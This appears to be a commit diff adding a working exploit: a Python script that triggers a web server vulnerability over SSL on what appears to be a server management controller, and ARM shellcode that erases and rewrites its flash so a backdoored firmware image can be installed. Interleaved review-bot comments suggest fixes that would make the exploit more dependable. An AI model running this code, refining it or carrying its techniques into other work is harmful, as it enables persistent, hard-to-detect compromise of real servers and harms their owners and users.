- Add exploit to write backdoored firmware through the web server vulnerability - Fix stability issues in the backdoored firmware - Make exploits great again! Stability++
1 parent
00d3859
commit b73d245
Showing
2 changed files
with
254 additions
and
0 deletions.
@@ -0,0 +1,81 @@ | ||
#!/usr/bin/python | ||
|
||
# [WORKING] Write to Flash | ||
|
||
import sys | ||
|
||
from exploit_helpers import * | ||
from hexdump import hexdump | ||
|
||
if len(sys.argv) < 4: | ||
print "[-] usage: %s remote_addr version file_to_write" % sys.argv[0] | ||
sys.exit(1) | ||
|
||
version = sys.argv[2] | ||
o = get_version_info(version) | ||
|
||
addr_start = 0 | ||
chip = 0 | ||
|
||
with open(sys.argv[3], "rb") as fff: | ||
to_write = fff.read() | ||
|
||
if len(to_write) == 0 or (len(to_write) % 0x10000) != 0: | ||
print "[-] Error, file len should be a multiple of 0x10000" | ||
sys.exit(1) | ||
|
||
s = ssl_connector(sys.argv[1], 443) | ||
|
||
print "[*] Assembling shellcode..." | ||
|
||
with open("flash_write_page.S","rb") as fff: | ||
shellcode = fff.read() % ( | ||
o["wbuff_addr"]+0x4000, | ||
o["SSL_Write"], | ||
o["SSL_Read"], | ||
addr_start, | ||
len(to_write), | ||
chip, | ||
o["VComClientSync_Call"], | ||
o["memcpy"] | ||
) | ||
|
||
bin_sc = asm_sc(shellcode) | ||
check_shellcode(bin_sc) | ||
|
||
sc_headers = get_sc_headers(bin_sc) | ||
sc_headers += get_flush_headers() | ||
|
||
vtable_headers = get_vtable_headers(o) | ||
cookies_headers = get_cookies_headers() | ||
|
||
ilo_version = get_xml_version(s, sc_headers + cookies_headers + vtable_headers) | ||
|
||
if version != ilo_version.replace(".",""): | ||
print "[-] Bad version specified in command line" | ||
|
||
ths = fill_threads(sys.argv[1], sc_headers + cookies_headers + vtable_headers) | ||
send_exploit(s, sc_headers + cookies_headers + vtable_headers, o) | ||
stop_threads(ths) | ||
|
||
btmp = "" | ||
out = "" | ||
amount = 0 | ||
to_write_len = len(to_write) | ||
while not btmp.startswith("EOT"): | ||
btmp = s.recv(0x818) | ||
if len(btmp) == 0: | ||
continue | ||
if "EOT" in btmp and len(btmp) < 16: | ||
print "[+] Done" | ||
break | ||
if "RDY" in btmp and len(btmp) < 16: | ||
print "[*] Ready! Send content (%x bytes)" % len(to_write) | ||
for k in xrange(0, to_write_len, 0x10000): | ||
s.send(to_write[k:k+0x10000]) | ||
print "[*] Sent %08x bytes..." % k | ||
else: | ||
amount += unpack_from("<L",btmp)[0] | ||
print "[*] %08x bytes written..." % amount | ||
|
||
|
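Review bot: The version check `if version != ilo_version.replace(".",""):` only prints "[-] Bad version specified in command line" and then falls through to `fill_threads`/`send_exploit` with the offsets looked up for the version given on the command line, so the one check that could stop a write against a mismatched image is advisory. It should terminate the way the two argument checks above it do: `sys.exit(1)` on the line after the print. The receive loop has the same fall-through shape: `if len(btmp) == 0: continue` treats a zero-length `recv` (the peer closed the connection) as "try again", so a closed connection keeps the loop spinning until something raises instead of reporting the failure. Indentation in this section was lost by the page rendering, so which lines sit inside the `if`/`with`/`while` bodies is inferred from context.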
@@ -0,0 +1,173 @@ | ||
start: | ||
PUSH {R5,R6,R8,LR} | ||
|
||
SUB SP, SP, #4 | ||
|
||
LDR R0, wbuff | ||
LDR R1, rdy | ||
STR R1, [R0] | ||
|
||
LDR R3, SSL_Write | ||
MOV R2, #0x4 | ||
LDR R1, wbuff | ||
MOV R0, R7 | ||
BLX R3 | ||
|
||
MOV R8, #0 | ||
do_page: | ||
|
||
MOV R6, #0 | ||
get_data: | ||
LDR R3, SSL_Read | ||
LDR R2, page_size | ||
LDR R1, wbuff | ||
MOV R5, #0x1000 | ||
ADD R1, R5 | ||
ADD R1, R6 | ||
MOV R0, R7 | ||
BLX R3 | ||
|
||
ADD R6, R0 | ||
|
||
LDR R1, wbuff | ||
STR R0, [R1] | ||
|
||
LDR R3, SSL_Write | ||
MOV R2, #0x8 | ||
LDR R1, wbuff | ||
MOV R0, R7 | ||
BLX R3 | ||
|
||
LDR R0, page_size | ||
CMP R6, R0 | ||
BNE get_data | ||
|
||
erase: | ||
LDR R3, wbuff | ||
LDR R0, off | ||
ADD R3, R3, R0 | ||
LDR R0, addr | ||
ADD R0, R8 | ||
STR R0, [R3] | ||
MOV R1, #0 | ||
STR R1, [R3, #4] | ||
LDR R2, chip | ||
STRB R2, [R3, #9] | ||
|
||
ADD R3, R3, #8 | ||
MOV R2, #0 | ||
STRB R2, [R3, #3] | ||
MOV R2, #0xD8 | ||
STRB R2, [R3, #2] | ||
SUB R3, R3, #8 | ||
|
||
MOV R1, #0xEE | ||
STRB R1, [R3, #0x110] | ||
MOV R0, #1 | ||
STRB R0, [R3, #0x111] | ||
|
||
LDR R5, VComClientSync_Call | ||
MOV R1, R3 | ||
LDR R2, insz | ||
LDR R3, wbuff | ||
LDR R0, off | ||
STR R0, [SP] | ||
ADR R0, svc_name | ||
BLX R5 | ||
|
||
MOV R6, #0 | ||
wloop: | ||
LDR R3, wbuff | ||
LDR R0, off | ||
ADD R3, R3, R0 | ||
LDR R0, addr | ||
ADD R0, R6 | ||
ADD R0, R8 | ||
STR R0, [R3] | ||
MOV R1, #0x100 | ||
STR R1, [R3, #4] | ||
LDR R2, chip | ||
STRB R2, [R3, #9] | ||
|
||
ADD R3, R3, #8 | ||
MOV R2, #0 | ||
STRB R2, [R3, #3] | ||
MOV R2, #0x2 | ||
STRB R2, [R3, #2] | ||
SUB R3, R3, #8 | ||
|
||
MOV R1, #0xEE | ||
STRB R1, [R3, #0x110] | ||
MOV R0, #1 | ||
STRB R0, [R3, #0x111] | ||
|
||
MOV R5, R3 | ||
|
||
MOV R2, #0x100 | ||
LDR R1, wbuff | ||
MOV R3, #0x1000 | ||
ADD R1, R3 | ||
ADD R1, R6 | ||
MOV R0, R5 | ||
ADD R0, #8 | ||
ADD R0, #5 | ||
LDR R3, memcpy | ||
BLX R3 | ||
|
||
MOV R1, R5 | ||
LDR R5, VComClientSync_Call | ||
LDR R2, insz | ||
LDR R3, wbuff | ||
LDR R0, off | ||
STR R0, [SP] | ||
ADR R0, svc_name | ||
BLX R5 | ||
|
||
ADD R6, #0x100 | ||
LDR R0, page_size | ||
CMP R6, R0 | ||
BNE wloop | ||
|
||
LDR R0, page_size | ||
ADD R8, R0 | ||
LDR R0, memcount | ||
CMP R8, R0 | ||
BNE do_page | ||
|
||
theend: | ||
LDR R0, wbuff | ||
LDR R1, eot | ||
STR R1, [R0] | ||
|
||
LDR R3, SSL_Write | ||
MOV R2, #0x8 | ||
LDR R1, wbuff | ||
MOV R0, R7 | ||
BLX R3 | ||
|
||
ADD SP, SP, #4 | ||
|
||
MOV R0, -257 | ||
POP {R5,R6,R8,LR} | ||
BX LR | ||
|
||
wbuff: .word 0x%x | ||
SSL_Write: .word 0x%x | ||
SSL_Read: .word 0x%x | ||
|
||
wsize: .word 0x818 | ||
off: .word 0x408 | ||
insz: .word 0x114 | ||
addr: .word 0x%x | ||
memcount: .word 0x%x | ||
chip: .word 0x%x | ||
VComClientSync_Call: .word 0x%x | ||
memcpy: .word 0x%x | ||
page_size: .word 0x10000 | ||
svc_name: .string "SpiService" | ||
.align | ||
eot: .string "EOT" | ||
.align | ||
rdy: .string "RDY" | ||
.align | ||
final: .word 0x41414141 |
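Review bot: The request buffer built at `erase:` and `wloop:` is filled field by field with bare offsets (`STRB R2, [R3, #9]`, `[R3, #2]`, `[R3, #3]`, `[R3, #0x110]`, `[R3, #0x111]`) and bare constants (`0xD8`, `0x2`, `0xEE`), and the data words `off: .word 0x408` and `insz: .word 0x114` carry no explanation, so a reader cannot tell which field each store sets without the structure definition this was derived from. Each store into the request and each label in the data section should get an `@` comment naming the field it sets, and `erase:`/`wloop:` a one-line header stating what message each loop assembles. `wsize: .word 0x818` is never loaded anywhere in this file; if it is kept only to mirror the `0x818` receive size on the Python side, a comment should say so, otherwise it should be dropped. `final: .word 0x41414141` is likewise unreferenced and should be annotated with its purpose.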